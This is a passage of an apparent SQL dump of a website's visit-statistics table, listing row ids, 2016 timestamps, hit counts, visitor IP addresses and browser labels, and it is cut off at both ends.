1469219690,1,1,0,0,'91.196.178.100','chrome'),(51464,1469219850,3,3,0,0,'69.197.177.26','other'),(51465,1469220130,1,1,0,0,'46.211.2.89','chrome'),(51466,1469220294,1,1,0,0,'141.8.142.61','other'),(51467,1469220371,1,1,0,0,'82.145.222.70','chrome'),(51468,1469220397,1,0,1,0,'66.249.78.164',''),(51469,1469220487,1,1,0,0,'141.8.142.58','other'),(51470,1469220660,1,0,1,0,'66.249.78.178',''),(51471,1469220728,2,2,0,0,'130.193.50.34','other'),(51472,1469220917,1,0,1,0,'66.249.78.136',''),(51473,1469220928,1,1,0,0,'130.193.51.19','other'),(51474,1469221183,1,1,0,0,'66.249.78.178','chrome'),(51475,1469221393,2,2,0,0,'141.8.183.25','other'),(51476,1469221541,1,1,0,0,'91.196.177.8','other'),(51477,1469221695,1,0,1,0,'66.249.78.171',''),(51478,1469222150,1,1,0,0,'180.76.15.17','other'),(51479,1469222347,2,2,0,0,'51.254.143.238','other'),(51480,1469222361,1,1,0,0,'141.8.142.67','other'),(51481,1469222464,1,1,0,0,'91.196.178.99','chrome'),(51482,1469222486,1,1,0,0,'130.193.51.19','other'),(51483,1469222560,1,1,0,0,'180.76.15.163','other'),(51484,1469222576,1,1,0,0,'92.112.181.195','chrome'),(51485,1469222710,1,1,0,0,'207.46.13.118','other'),(51486,1469222749,1,1,0,0,'151.80.31.175','other'),(51487,1469223066,2,0,2,0,'66.249.78.171',''),(51488,1469223316,1,1,0,0,'130.193.50.34','other'),(51489,1469223959,1,1,0,0,'91.196.178.164','chrome'),(51490,1469224105,2,0,2,0,'66.249.78.178',''),(51491,1469224172,1,0,1,0,'66.249.78.136',''),(51492,1469224306,1,1,0,0,'91.124.239.252','firefox'),(51493,1469224469,1,1,0,0,'37.73.170.146','chrome'),(51494,1469225123,2,0,2,0,'66.249.78.143',''),(51495,1469225266,1,0,1,0,'66.249.78.136',''),(51496,1469225293,1,0,1,0,'66.249.69.187',''),(51497,1469226227,1,1,0,0,'130.193.51.19','other'),(51498,1469226417,1,1,0,0,'93.158.152.84','other'),(51499,1469226715,1,1,0,0,'141.8.142.61','other'),(51500,1469227150,1,0,1,0,'66.249.78.164',''),(51501,1469227170,1,0,1,0,'66.249.69.185',''),(51502,1469227434,1,0,1,0,'66.249.78.150',''),(51503,1469227580,1,1,0,0,'66.249.78.150','chrome'),(51504,1469227963,16,16,0,0,'86.132.214.14','other'),(51505,1469227970,1,1,0,0,'141.8.142.61','other'),(51506,1469228096,1,1,0,0,'141.8.142.58','other'),(51507,1469228218,1,0,1,0,'66.249.78.178',''),(51508,1469228681,1,1,0,0,'141.8.183.25','other'),(51509,1469228915,1,1,0,0,'130.193.50.34','other'),(51510,1469231026,1,0,1,0,'66.249.78.178',''),(51511,1469231380,2,0,2,0,'66.249.78.164',''),(51512,1469231793,1,1,0,0,'66.249.78.150','chrome'),(51513,1469231842,2,0,2,0,'66.249.78.143',''),(51514,1469231858,1,0,1,0,'66.249.78.136',''),(51515,1469233412,1,1,0,0,'141.8.142.61','other'),(51516,1469233697,2,2,0,0,'130.193.51.19','other'),(51517,1469233827,1,1,0,0,'93.158.152.84','other'),(51518,1469233954,2,1,1,0,'66.249.78.171',''),(51519,1469234069,1,1,0,0,'141.8.183.25','other'),(51520,1469235399,1,1,0,0,'91.196.177.8','chrome'),(51521,1469235798,1,1,0,0,'164.132.161.44','other'),(51522,1469235845,2,0,2,0,'66.249.78.164',''),(51523,1469236206,1,1,0,0,'130.193.51.19','other'),(51524,1469236606,1,0,1,0,'66.249.78.150',''),(51525,1469236659,1,1,0,0,'5.9.123.116','other'),(51526,1469237636,1,0,1,0,'66.249.78.136',''),(51527,1469237873,1,0,1,0,'66.249.78.171',''),(51528,1469239437,1,1,0,0,'51.255.65.95','other'),(51529,1469240120,1,1,0,0,'151.80.31.179','other'),(51530,1469240247,1,0,1,0,'68.180.230.111',''),(51531,1469240436,1,1,0,0,'141.8.142.85','other'),(51532,1469240894,1,0,1,0,'66.249.78.136',''),(51533,1469240946,1,0,1,0,'66.249.78.178',''),(51534,1469241011,2,2,0,0,'130.193.51.19','other'),(51535,1469241154,2,0,2,0,'66.249.78.143',''),(51536,1469241324,1,0,1,0,'68.180.230.111',''),(51537,1469241688,1,1,0,0,'130.193.50.34','other'),(51538,1469241824,1,1,0,0,'141.8.142.58','other'),(51539,1469241965,1,1,0,0,'141.8.183.25','other'),(51540,1469241991,1,1,0,0,'207.46.13.118','other'),(51541,1469242510,1,0,1,0,'66.249.78.136',''),(51542,1469242672,1,1,0,0,'130.193.51.19','other'),(51543,1469242703,2,2,0,0,'66.249.78.136','chrome'),(51544,1469242787,1,1,0,0,'66.249.78.164','chrome'),(51545,1469242898,2,1,1,0,'66.249.78.150',''),(51546,1469242945,1,0,1,0,'66.249.78.171',''),(51547,1469243510,1,0,1,0,'66.249.78.143',''),(51548,1469243608,1,1,0,0,'66.249.78.136','chrome'),(51549,1469243874,1,1,0,0,'130.193.51.19','other'),(51550,1469244064,1,0,1,0,'66.249.78.171',''),(51551,1469244110,1,0,1,0,'66.249.78.164',''),(51552,1469244554,1,1,0,0,'66.249.78.143','chrome'),(51553,1469246099,1,1,0,0,'66.249.78.143','chrome'),(51554,1469246403,1,1,0,0,'51.255.65.28','other'),(51555,1469246449,1,1,0,0,'66.249.78.150','chrome'),(51556,1469246932,1,1,0,0,'141.0.15.100','other'),(51557,1469247321,1,1,0,0,'130.193.51.19','other'),(51558,1469247340,1,1,0,0,'37.73.205.69','other'),(51559,1469247890,1,0,1,0,'66.249.78.164',''),(51560,1469247933,2,0,2,0,'66.249.78.171',''),(51561,1469248048,1,1,0,0,'130.193.50.34','other'),(51562,1469248797,1,1,0,0,'217.69.134.143','other'),(51563,1469248911,1,1,0,0,'51.255.65.13','other'),(51564,1469249405,1,1,0,0,'130.193.50.34','other'),(51565,1469249411,1,0,1,0,'66.249.78.136',''),(51566,1469249750,1,1,0,0,'141.8.142.58','other'),(51567,1469249937,1,1,0,0,'151.80.31.109','other'),(51568,1469250209,1,1,0,0,'51.255.65.16','other'),(51569,1469250248,1,1,0,0,'92.113.156.251','chrome'),(51570,1469250318,1,1,0,0,'180.76.15.18','other'),(51571,1469252401,1,1,0,0,'82.145.209.82','other'),(51572,1469252620,1,1,0,0,'212.55.84.182','chrome'),(51573,1469253687,1,1,0,0,'66.249.81.208','chrome'),(51574,1469253776,1,1,0,0,'130.193.50.34','other'),(51575,1469254225,1,1,0,0,'64.113.32.29','chrome'),(51576,1469254524,1,0,1,0,'66.249.69.155',''),(51577,1469254715,1,0,1,0,'66.249.69.152',''),(51578,1469255058,1,0,1,0,'66.249.78.164',''),(51579,1469255707,1,1,0,0,'95.133.238.59','chrome'),(51580,1469256137,1,1,0,0,'141.8.142.58','other'),(51581,1469256189,1,0,1,0,'66.249.78.150',''),(51582,1469257149,1,0,1,0,'66.249.78.150',''),(51583,1469257251,1,1,0,0,'212.90.62.86','other'),(51584,1469257775,1,1,0,0,'141.8.142.58','other'),(51585,1469258023,1,1,0,0,'151.80.31.157','other'),(51586,1469258086,1,0,1,0,'66.249.78.150',''),(51587,1469258358,2,0,2,0,'66.249.78.171',''),(51588,1469258361,2,0,2,0,'66.249.78.164',''),(51589,1469258736,1,1,0,0,'37.52.19.128','chrome'),(51590,1469258797,1,1,0,0,'46.211.4.38','other'),(51591,1469259009,1,1,0,0,'141.0.15.96','other'),(51592,1469259382,1,1,0,0,'141.8.142.61','other'),(51593,1469261061,1,0,1,0,'66.249.78.150',''),(51594,1469261401,1,1,0,0,'157.55.39.157','other'),(51595,1469261599,1,0,1,0,'66.249.78.143',''),(51596,1469262015,1,0,1,0,'66.249.78.164',''),(51597,1469262117,1,0,1,0,'66.249.78.136',''),(51598,1469262332,1,1,0,0,'91.124.239.167','firefox'),(51599,1469263006,1,1,0,0,'164.132.161.39','other'),(51600,1469263747,1,0,1,0,'66.249.78.164',''),(51601,1469264042,1,1,0,0,'180.76.15.145','other'),(51602,1469264120,1,0,1,0,'66.249.78.150',''),(51603,1469264512,1,1,0,0,'51.255.65.37','other'),(51604,1469264552,1,0,1,0,'66.249.78.136',''),(51605,1469264951,1,1,0,0,'141.8.142.58','other'),(51606,1469265215,1,0,1,0,'66.249.78.164',''),(51607,1469265238,1,1,0,0,'130.193.50.34','other'),(51608,1469265474,1,0,1,0,'66.249.78.143',''),(51609,1469265517,3,3,0,0,'141.8.183.25','other'),(51610,1469265530,1,1,0,0,'217.69.133.169','firefox'),(51611,1469265994,1,1,0,0,'94.179.11.25','chrome'),(51612,1469266032,1,0,1,0,'66.249.69.187',''),(51613,1469266164,1,1,0,0,'130.193.51.19','other'),(51614,1469266193,1,0,1,0,'66.249.78.178',''),(51615,1469266593,1,0,1,0,'66.249.78.143',''),(51616,1469267335,1,1,0,0,'94.179.11.25','chrome'),(51617,1469267553,1,0,1,0,'66.249.69.187',''),(51618,1469267697,1,1,0,0,'141.8.183.25','other'),(51619,1469267822,1,1,0,0,'93.158.152.84','other'),(51620,1469268250,1,0,1,0,'66.249.78.178',''),(51621,1469268426,1,0,1,0,'66.249.78.136',''),(51622,1469268536,1,1,0,0,'178.92.170.212','chrome'),(51623,1469269264,1,0,1,0,'66.249.78.171',''),(51624,1469269302,3,3,0,0,'130.193.51.19','other'),(51625,1469269329,2,2,0,0,'51.254.32.63','other'),(51626,1469269559,2,2,0,0,'141.8.183.25','other'),(51627,1469269918,1,1,0,0,'91.124.239.167','firefox'),(51628,1469270632,1,0,1,0,'66.249.78.171',''),(51629,1469271181,1,0,1,0,'66.249.69.149',''),(51630,1469271224,1,0,1,0,'66.249.78.136',''),(51631,1469271525,2,0,2,0,'66.249.78.150',''),(51632,1469271988,2,0,2,0,'66.249.78.178',''),(51633,1469272128,2,0,2,0,'66.249.78.164',''),(51634,1469272401,1,1,0,0,'37.54.20.30','other'),(51635,1469272593,1,0,1,0,'66.249.78.143',''),(51636,1469272606,1,0,1,0,'66.249.78.136',''),(51637,1469272811,1,0,1,0,'66.249.78.171',''),(51638,1469273664,1,0,1,0,'66.249.78.178',''),(51639,1469273891,1,1,0,0,'91.196.178.133','chrome'),(51640,1469274127,2,0,2,0,'66.249.78.143',''),(51641,1469274183,1,0,1,0,'66.249.78.136',''),(51642,1469274466,1,1,0,0,'91.196.178.37','chrome'),(51643,1469274469,1,1,0,0,'151.80.31.101','other'),(51644,1469275059,1,1,0,0,'85.207.39.128','chrome'),(51645,1469275403,1,1,0,0,'91.196.176.13','chrome'),(51646,1469275621,1,1,0,0,'164.132.161.65','other'),(51647,1469276413,1,1,0,0,'151.80.31.167','other'),(51648,1469276526,1,1,0,0,'130.193.50.34','other'),(51649,1469276827,1,0,1,0,'66.249.78.178',''),(51650,1469278094,2,0,2,0,'66.249.78.171',''),(51651,1469278780,1,1,0,0,'91.196.178.70','chrome'),(51652,1469279408,3,3,0,0,'66.249.78.150','chrome'),(51653,1469279554,2,0,2,0,'68.180.230.111',''),(51654,1469279640,1,0,1,0,'66.249.78.143',''),(51655,1469279744,1,1,0,0,'178.255.215.94','other'),(51656,1469280116,2,2,0,0,'66.249.78.136','chrome'),(51657,1469280392,1,1,0,0,'180.76.15.151','other'),(51658,1469281062,1,0,1,0,'68.180.230.111',''),(51659,1469281384,1,1,0,0,'66.249.78.136','chrome'),(51660,1469281657,1,1,0,0,'66.249.78.150','chrome'),(51661,1469282718,1,1,0,0,'164.132.161.20','other'),(51662,1469282904,1,1,0,0,'151.80.31.180','other'),(51663,1469283312,2,2,0,0,'130.193.51.19','other'),(51664,1469283327,1,1,0,0,'141.8.183.25','other'),(51665,1469283479,2,0,2,0,'66.249.78.136',''),(51666,1469283652,1,1,0,0,'66.249.78.150','chrome'),(51667,1469284293,1,1,0,0,'164.132.161.48','other'),(51668,1469285018,1,1,0,0,'37.229.62.94','other'),(51669,1469285306,1,1,0,0,'51.255.65.51','other'),(51670,1469286532,1,1,0,0,'151.80.31.108','other'),(51671,1469286725,1,1,0,0,'66.249.78.143','chrome'),(51672,1469287414,1,1,0,0,'151.80.31.156','other'),(51673,1469288162,1,1,0,0,'66.249.78.143','chrome'),(51674,1469288267,1,1,0,0,'178.94.172.247','chrome'),(51675,1469288311,1,1,0,0,'66.249.93.109','chrome'),(51676,1469289153,1,1,0,0,'178.92.8.200','chrome'),(51677,1469289210,3,2,1,0,'66.249.78.136',''),(51678,1469289406,1,1,0,0,'141.0.14.213','other'),(51679,1469290380,1,0,1,0,'66.249.78.136',''),(51680,1469290996,1,0,1,0,'66.249.78.143',''),(51681,1469291044,2,2,0,0,'66.249.78.150','chrome'),(51682,1469291893,1,0,1,0,'66.249.78.164',''),(51683,1469292331,1,1,0,0,'66.249.78.143','chrome'),(51684,1469292460,1,1,0,0,'51.255.65.7','other'),(51685,1469292581,1,0,1,0,'66.249.78.136',''),(51686,1469292599,1,1,0,0,'141.0.15.208','other'),(51687,1469292655,1,1,0,0,'51.255.65.12','other'),(51688,1469293902,1,1,0,0,'151.80.31.103','other'),(51689,1469294061,1,0,1,0,'66.249.78.136',''),(51690,1469294168,1,0,1,0,'66.249.78.143',''),(51691,1469294233,1,1,0,0,'130.180.209.241','chrome'),(51692,1469294300,2,2,0,0,'144.76.29.66','other'),(51693,1469295376,1,1,0,0,'157.55.39.46','other'),(51694,1469295807,1,1,0,0,'151.80.31.183','other'),(51695,1469295848,1,0,1,0,'66.249.78.136',''),(51696,1469296376,1,0,1,0,'66.249.78.150',''),(51697,1469296553,1,0,1,0,'66.249.78.164',''),(51698,1469296668,2,2,0,0,'142.54.184.90','other'),(51699,1469296796,1,1,0,0,'91.196.178.161','other'),(51700,1469296927,1,1,0,0,'91.196.178.34','chrome'),(51701,1469297548,1,1,0,0,'164.132.161.81','other'),(51702,1469298116,1,0,1,0,'66.249.78.178',''),(51703,1469298381,1,1,0,0,'66.249.78.150','chrome'),(51704,1469298434,1,1,0,0,'91.142.163.222','other'),(51705,1469298645,2,0,2,0,'66.249.78.136',''),(51706,1469299644,1,0,1,0,'66.249.78.150',''),(51707,1469300234,1,1,0,0,'91.124.239.167','firefox'),(51708,1469300778,2,2,0,0,'91.196.178.165','chrome'),(51709,1469300857,1,1,0,0,'91.196.178.101','chrome'),(51710,1469302048,1,1,0,0,'91.196.178.37','other'),(51711,1469302433,1,0,1,0,'66.249.78.164',''),(51712,1469303009,1,0,1,0,'66.249.69.189',''),(51713,1469303085,1,1,0,0,'180.76.15.146','other'),(51714,1469303295,1,1,0,0,'141.0.15.247','other'),(51715,1469303348,1,1,0,0,'66.249.69.152','chrome'),(51716,1469303379,9,9,0,0,'46.4.32.75','other'),(51717,1469303402,1,0,1,0,'66.249.78.171',''),(51718,1469303947,1,1,0,0,'66.249.78.136','chrome'),(51719,1469304243,1,0,1,0,'66.249.78.178',''),(51720,1469304755,1,1,0,0,'212.55.84.182','chrome'),(51721,1469304881,1,0,1,0,'66.249.78.171',''),(51722,1469305131,1,1,0,0,'92.112.105.65','chrome'),(51723,1469305375,1,1,0,0,'164.132.161.54','other'),(51724,1469305886,1,1,0,0,'164.132.161.26','other'),(51725,1469305947,1,1,0,0,'92.113.156.3','chrome'),(51726,1469306210,1,0,1,0,'66.249.78.136',''),(51727,1469306372,1,0,1,0,'66.249.78.164',''),(51728,1469306486,1,0,1,0,'66.249.69.189',''),(51729,1469306657,1,1,0,0,'188.146.133.220','chrome'),(51730,1469307339,1,1,0,0,'94.179.86.238','chrome'),(51731,1469308334,1,1,0,0,'180.76.15.156','other'),(51732,1469309337,1,1,0,0,'91.214.19.5','firefox'),(51733,1469310344,1,1,0,0,'180.76.15.150','other'),(51734,1469311135,1,1,0,0,'66.249.81.216','chrome'),(51735,1469311141,1,0,1,0,'66.249.78.150',''),(51736,1469311298,1,0,1,0,'66.249.78.178',''),(51737,1469311357,1,0,1,0,'66.249.78.171',''),(51738,1469311366,1,0,1,0,'66.249.78.164',''),(51739,1469311466,2,0,2,0,'66.249.78.136',''),(51740,1469312127,1,1,0,0,'157.55.39.46','other'),(51741,1469312598,1,1,0,0,'180.76.15.154','other'),(51742,1469313779,1,0,1,0,'66.249.78.143',''),(51743,1469315113,2,1,1,0,'66.249.78.150',''),(51744,1469315296,1,0,1,0,'66.249.69.187',''),(51745,1469316822,1,0,1,0,'66.249.78.136',''),(51746,1469318644,1,1,0,0,'157.55.39.46','other'),(51747,1469319026,1,0,1,0,'66.249.69.185',''),(51748,1469320184,1,1,0,0,'164.132.161.83','other'),(51749,1469321143,1,1,0,0,'180.76.15.160','other'),(51750,1469322666,1,0,1,0,'68.180.230.111',''),(51751,1469323751,1,1,0,0,'91.142.163.222','other'),(51752,1469323879,1,0,1,0,'66.249.78.178',''),(51753,1469324414,1,0,1,0,'66.249.78.171',''),(51754,1469324576,1,0,1,0,'66.249.78.136',''),(51755,1469325162,1,1,0,0,'180.76.15.13','other'),(51756,1469327194,2,0,2,0,'66.249.78.150',''),(51757,1469327599,1,1,0,0,'174.129.237.157','other'),(51758,1469327796,1,1,0,0,'66.249.78.150','chrome'),(51759,1469327849,2,0,2,0,'66.249.78.136',''),(51760,1469328290,1,0,1,0,'66.249.78.178',''),(51761,1469328552,1,0,1,0,'66.249.78.164',''),(51762,1469328796,1,1,0,0,'207.46.13.43','other'),(51763,1469329679,1,0,1,0,'66.249.69.155',''),(51764,1469329700,1,1,0,0,'66.249.78.143','chrome'),(51765,1469329731,1,1,0,0,'151.80.31.171','other'),(51766,1469330275,1,1,0,0,'66.249.78.150','chrome'),(51767,1469330684,1,1,0,0,'66.249.78.136','chrome'),(51768,1469331686,2,0,2,0,'66.249.78.136',''),(51769,1469331869,2,2,0,0,'5.9.88.103','other'),(51770,1469332354,2,0,2,0,'66.249.78.143',''),(51771,1469332809,1,1,0,0,'164.132.161.53','other'),(51772,1469333701,2,1,1,0,'66.249.78.136',''),(51773,1469333868,1,1,0,0,'151.80.31.159','other'),(51774,1469334013,1,1,0,0,'180.76.15.135','other'),(51775,1469334234,1,0,1,0,'66.249.69.185',''),(51776,1469334351,1,1,0,0,'51.255.65.38','other'),(51777,1469334661,1,1,0,0,'66.249.78.150','chrome'),(51778,1469335326,1,1,0,0,'51.255.65.60','other'),(51779,1469335347,1,0,1,0,'68.180.230.111',''),(51780,1469336718,1,1,0,0,'212.55.84.182','chrome'),(51781,1469337881,1,1,0,0,'66.249.78.143','chrome'),(51782,1469337917,2,0,2,0,'66.249.78.164',''),(51783,1469338312,1,0,1,0,'66.249.66.183',''),(51784,1469338540,2,0,2,0,'66.249.78.136',''),(51785,1469338612,2,0,2,0,'66.249.78.150',''),(51786,1469338616,1,0,1,0,'66.249.66.177',''),(51787,1469338650,2,0,2,0,'66.249.66.185',''),(51788,1469338713,1,1,0,0,'66.249.66.185','chrome'),(51789,1469338728,1,0,1,0,'66.249.66.182',''),(51790,1469338905,1,1,0,0,'66.249.66.183','chrome'),(51791,1469339264,1,0,1,0,'66.249.78.143',''),(51792,1469339409,1,0,1,0,'66.249.66.188',''),(51793,1469340229,1,1,0,0,'91.196.178.103','other'),(51794,1469341463,1,0,1,0,'66.249.78.143',''),(51795,1469341686,1,1,0,0,'66.249.66.185','chrome'),(51796,1469342036,1,1,0,0,'37.54.20.106','firefox'),(51797,1469342045,1,1,0,0,'66.249.66.177','chrome'),(51798,1469344623,1,1,0,0,'164.132.161.30','other'),(51799,1469345072,1,1,0,0,'66.249.78.143','chrome'),(51800,1469345114,1,0,1,0,'66.249.78.150',''),(51801,1469345322,1,0,1,0,'68.180.230.111',''),(51802,1469345467,1,1,0,0,'66.249.78.136','chrome'),(51803,1469345888,1,1,0,0,'37.54.20.106','firefox'),(51804,1469346052,1,1,0,0,'176.77.25.24','chrome'),(51805,1469346053,1,1,0,0,'188.32.233.46','msie'),(51807,1469346054,1,1,0,0,'176.77.105.216','chrome'),(51808,1469346099,1,1,0,0,'164.132.161.5','other'),(51809,1469346720,1,1,0,0,'51.255.65.43','other'),(51810,1469347051,1,1,0,0,'66.249.78.171','chrome'),(51811,1469347073,1,1,0,0,'212.55.84.182','chrome'),(51812,1469347512,1,1,0,0,'91.196.178.164','firefox'),(51813,1469347527,1,1,0,0,'40.77.167.81','other'),(51814,1469349244,1,0,1,0,'66.249.78.164',''),(51815,1469349660,1,0,1,0,'66.249.78.136',''),(51816,1469349681,1,1,0,0,'66.249.93.117','chrome'),(51817,1469350757,1,1,0,0,'78.111.190.61','chrome'),(51818,1469350959,1,0,1,0,'66.249.78.136',''),(51819,1469351055,1,1,0,0,'130.180.210.53','chrome'),(51820,1469351190,1,0,1,0,'66.249.78.171',''),(51821,1469351517,1,0,1,0,'66.249.66.180',''),(51822,1469351662,1,0,1,0,'66.249.78.143',''),(51823,1469351918,1,0,1,0,'66.249.78.150',''),(51824,1469351958,1,1,0,0,'130.180.210.53','chrome'),(51825,1469351992,2,0,2,0,'66.249.78.178',''),(51826,1469353905,1,1,0,0,'91.196.178.164','other'),(51827,1469354273,1,0,1,0,'66.249.66.182',''),(51828,1469354499,2,2,0,0,'91.196.178.71','chrome'),(51829,1469356028,1,1,0,0,'178.150.77.220','chrome'),(51830,1469356629,1,1,0,0,'40.77.167.70','other'),(51831,1469356655,2,2,0,0,'91.196.178.71','other'),(51832,1469356675,1,0,1,0,'68.180.230.178',''),(51833,1469356876,1,1,0,0,'195.154.183.187','chrome'),(51834,1469357601,1,1,0,0,'91.196.178.39','firefox'),(51835,1469357661,1,1,0,0,'178.150.77.220','chrome'),(51836,1469358121,1,1,0,0,'212.55.84.182','chrome'),(51837,1469358540,1,1,0,0,'91.196.178.134','other'),(51838,1469359132,1,1,0,0,'66.249.81.205','chrome'),(51839,1469360048,1,1,0,0,'91.196.178.162','other'),(51840,1469360677,1,1,0,0,'217.69.133.226','other'),(51841,1469360778,1,1,0,0,'51.255.65.15','other'),(51842,1469361154,1,0,1,0,'66.249.66.188',''),(51843,1469361184,1,1,0,0,'66.249.69.189','chrome'),(51844,1469362973,31,31,0,0,'51.255.207.26','other'),(51845,1469364443,1,1,0,0,'91.196.178.162','other'),(51846,1469365050,1,0,1,0,'68.180.230.111',''),(51847,1469366114,1,1,0,0,'193.194.127.217','firefox'),(51848,1469366918,1,1,0,0,'66.249.66.188','chrome'),(51849,1469366978,1,1,0,0,'91.196.178.129','chrome'),(51850,1469367997,1,1,0,0,'91.196.178.71','chrome'),(51851,1469368015,1,1,0,0,'141.0.15.54','other'),(51852,1469368608,1,1,0,0,'157.55.39.46','other'),(51853,1469370784,1,0,1,0,'66.249.66.182',''),(51854,1469371075,1,0,1,0,'66.249.66.185',''),(51855,1469371172,1,0,1,0,'66.249.78.143',''),(51856,1469371405,1,0,1,0,'66.249.66.188',''),(51857,1469371497,1,1,0,0,'188.32.139.54','msie'),(51858,1469371503,1,1,0,0,'176.195.121.31','msie'),(51859,1469371508,1,1,0,0,'95.221.200.253','msie'),(51860,1469371515,1,1,0,0,'178.140.235.191','msie'),(51861,1469371990,1,1,0,0,'66.249.78.150','chrome'),(51862,1469372195,1,0,1,0,'66.249.66.182',''),(51863,1469372233,1,0,1,0,'66.249.78.171',''),(51864,1469372614,1,1,0,0,'180.76.15.20','other'),(51865,1469372949,1,1,0,0,'66.249.78.136','chrome'),(51866,1469373203,1,1,0,0,'66.249.78.164','chrome'),(51867,1469373497,1,1,0,0,'66.249.78.171','chrome'),(51868,1469374795,1,1,0,0,'40.77.167.70','other'),(51869,1469375683,1,1,0,0,'46.133.112.169','other'),(51870,1469375713,1,1,0,0,'51.255.65.2','other'),(51871,1469376429,1,0,1,0,'66.249.69.187',''),(51872,1469377007,1,1,0,0,'180.76.15.150','other'),(51873,1469377436,1,1,0,0,'51.255.65.42','other'),(51874,1469377543,1,1,0,0,'178.92.8.200','chrome'),(51875,1469378391,3,3,0,0,'66.249.78.143','chrome'),(51876,1469378976,1,1,0,0,'66.249.78.136','chrome'),(51877,1469380499,1,1,0,0,'66.249.78.150','chrome'),(51878,1469380681,1,1,0,0,'66.249.66.182','chrome'),(51879,1469380840,1,1,0,0,'176.195.252.151','chrome'),(51880,1469380841,1,1,0,0,'176.193.96.166','other'),(51881,1469380843,1,1,0,0,'37.112.36.214','msie'),(51883,1469381369,1,0,1,0,'68.180.230.111',''),(51884,1469382008,1,1,0,0,'88.252.192.93','other'),(51885,1469382257,1,1,0,0,'78.111.189.37','chrome'),(51886,1469382926,1,1,0,0,'157.55.39.46','other'),(51887,1469383623,1,0,1,0,'66.249.69.155',''),(51888,1469384306,1,0,1,0,'66.249.66.182',''),(51889,1469384529,1,1,0,0,'51.255.65.63','other'),(51890,1469384636,1,1,0,0,'88.252.192.93','other'),(51891,1469386979,1,1,0,0,'51.255.65.21','other'),(51892,1469387055,1,1,0,0,'46.133.112.169','other'),(51893,1469388412,1,1,0,0,'164.132.161.82','other'),(51894,1469389990,1,1,0,0,'46.135.59.254','other'),(51895,1469390019,1,1,0,0,'141.8.142.58','other'),(51896,1469390387,8,8,0,0,'95.158.189.118','other'),(51897,1469391181,1,1,0,0,'46.135.59.254','other'),(51898,1469391304,9,9,0,0,'95.158.189.118','other'),(51899,1469391840,1,1,0,0,'180.76.15.148','other'),(51900,1469392570,1,1,0,0,'92.113.188.206','other'),(51901,1469393094,1,0,1,0,'66.249.78.143',''),(51902,1469393414,1,1,0,0,'46.135.59.254','other'),(51903,1469393573,1,0,1,0,'66.249.66.182',''),(51904,1469395163,1,0,1,0,'68.180.230.111',''),(51905,1469396433,1,1,0,0,'46.135.59.254','other'),(51906,1469401877,1,1,0,0,'180.76.15.146','other'),(51907,1469403701,1,1,0,0,'40.77.167.70','other'),(51908,1469403884,1,1,0,0,'51.255.65.66','other'),(51909,1469404742,1,1,0,0,'51.255.65.26','other'),(51910,1469405496,1,0,1,0,'66.249.66.188',''),(51911,1469406054,1,1,0,0,'66.249.66.185','chrome'),(51912,1469406370,2,2,0,0,'66.249.78.150','chrome'),(51913,1469406876,2,2,0,0,'66.249.78.143','chrome'),(51914,1469407412,4,4,0,0,'66.249.78.136','chrome'),(51915,1469407465,2,2,0,0,'66.249.78.150','chrome'),(51916,1469407726,1,1,0,0,'180.76.15.163','other'),(51917,1469407817,1,1,0,0,'66.249.78.178','chrome'),(51918,1469412906,1,0,1,0,'68.180.230.111',''),(51919,1469417822,1,1,0,0,'66.249.78.136','chrome'),(51920,1469417835,1,1,0,0,'180.76.15.138','other'),(51921,1469418288,1,0,1,0,'68.180.230.111',''),(51922,1469418435,1,1,0,0,'217.69.133.3','other'),(51923,1469419844,1,1,0,0,'180.76.15.22','other'),(51924,1469420181,2,2,0,0,'86.132.214.14','other'),(51925,1469420515,6,6,0,0,'88.252.192.93','other'),(51926,1469420525,1,1,0,0,'51.255.65.40','other'),(51927,1469420838,1,1,0,0,'157.55.39.207','other'),(51928,1469421813,1,1,0,0,'46.133.83.71','other'),(51929,1469422418,1,1,0,0,'78.46.50.246','other'),(51930,1469422703,1,1,0,0,'94.179.245.176','chrome'),(51931,1469422840,1,1,0,0,'164.132.161.84','other'),(51932,1469423019,1,1,0,0,'66.249.78.136','chrome'),(51933,1469423371,1,1,0,0,'66.249.78.143','chrome'),(51934,1469423559,1,1,0,0,'66.249.81.202','chrome'),(51935,1469423596,1,0,1,0,'66.249.78.178',''),(51936,1469423783,1,1,0,0,'157.55.39.46','other'),(51937,1469423970,2,0,2,0,'66.249.78.136',''),(51938,1469424099,1,1,0,0,'66.249.78.136','chrome'),(51939,1469424199,1,1,0,0,'66.249.78.164','chrome'),(51940,1469424474,1,1,0,0,'91.196.178.39','firefox'),(51941,1469424939,1,1,0,0,'91.196.178.38','chrome'),(51942,1469425896,1,0,1,0,'66.249.78.136',''),(51943,1469425931,1,0,1,0,'66.249.78.143',''),(51944,1469426041,1,0,1,0,'68.180.230.111',''),(51945,1469426089,2,0,2,0,'66.249.78.164',''),(51946,1469426136,1,0,1,0,'66.249.78.178',''),(51947,1469426190,1,1,0,0,'91.196.178.72','firefox'),(51948,1469426247,1,1,0,0,'66.249.69.185','chrome'),(51949,1469426333,1,0,1,0,'66.249.78.171',''),(51950,1469426682,4,4,0,0,'144.76.7.107','other'),(51951,1469427847,1,1,0,0,'46.219.253.169','chrome'),(51952,1469428242,1,1,0,0,'94.179.242.65','chrome'),(51953,1469428931,1,1,0,0,'91.196.178.68','chrome'),(51954,1469429038,1,0,1,0,'66.249.78.136',''),(51955,1469429095,1,1,0,0,'51.255.65.90','other'),(51956,1469429423,1,1,0,0,'82.207.91.234','firefox'),(51957,1469429993,1,0,1,0,'66.249.78.178',''),(51958,1469430351,11,11,0,0,'144.76.12.75','other'),(51959,1469431017,1,1,0,0,'212.26.138.220','other'),(51960,1469431027,1,1,0,0,'91.196.178.68','firefox'),(51961,1469431118,1,1,0,0,'141.8.183.25','other'),(51962,1469431226,1,1,0,0,'178.92.8.232','chrome'),(51963,1469431518,2,2,0,0,'195.154.194.178','other'),(51964,1469431520,1,1,0,0,'195.154.194.178','firefox'),(51965,1469432092,1,1,0,0,'93.171.185.196','chrome'),(51966,1469432102,1,1,0,0,'130.193.50.34','other'),(51967,1469432568,1,1,0,0,'92.113.8.38','firefox'),(51968,1469432700,1,1,0,0,'164.132.161.17','other'),(51969,1469432720,1,0,1,0,'66.249.78.164',''),(51970,1469433188,1,1,0,0,'46.147.118.107','chrome'),(51971,1469433478,1,1,0,0,'109.195.91.196','chrome'),(51972,1469433494,1,1,0,0,'37.146.206.157','other'),(51973,1469433564,1,1,0,0,'141.8.142.67','other'),(51974,1469433597,2,0,2,0,'66.249.78.171',''),(51975,1469433646,1,1,0,0,'212.55.84.26','chrome'),(51976,1469433801,1,1,0,0,'91.196.178.68','chrome'),(51977,1469433855,1,1,0,0,'164.132.161.45','other'),(51978,1469434230,1,1,0,0,'19